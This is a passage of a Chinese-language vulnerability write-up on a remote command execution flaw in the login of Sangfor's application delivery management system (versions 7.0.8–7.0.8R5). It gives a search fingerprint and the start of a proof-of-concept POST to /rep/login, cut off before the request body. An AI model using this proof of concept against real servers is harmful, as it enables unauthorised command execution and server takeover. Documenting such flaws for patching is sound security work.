漏洞描述
深信服 应⽤交付管理系统 login 存在远程命令执⾏漏洞,攻击者通过漏洞可以获取服务器权
限,执⾏任意命令
漏洞影响版本
深信服 应⽤交付管理系统 7.0.8-7.0.8R5
fid=”iaytNA57019/kADk8Nev7g==”
漏洞复现
输入账号密码拦截登录请求包,然后更改数据包。
漏洞验证poc
POST /rep/login HTTP/1.1
Host: XX.XX.XX.XX
Connection: close
Content-Length: 121
sec-ch-ua: "Not_A Brand";v="8", "Chromium";v="120", "Google Chrome";v="120"
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
sec-ch-ua-platform: "macOS"
Sec-Fetch-Site: sam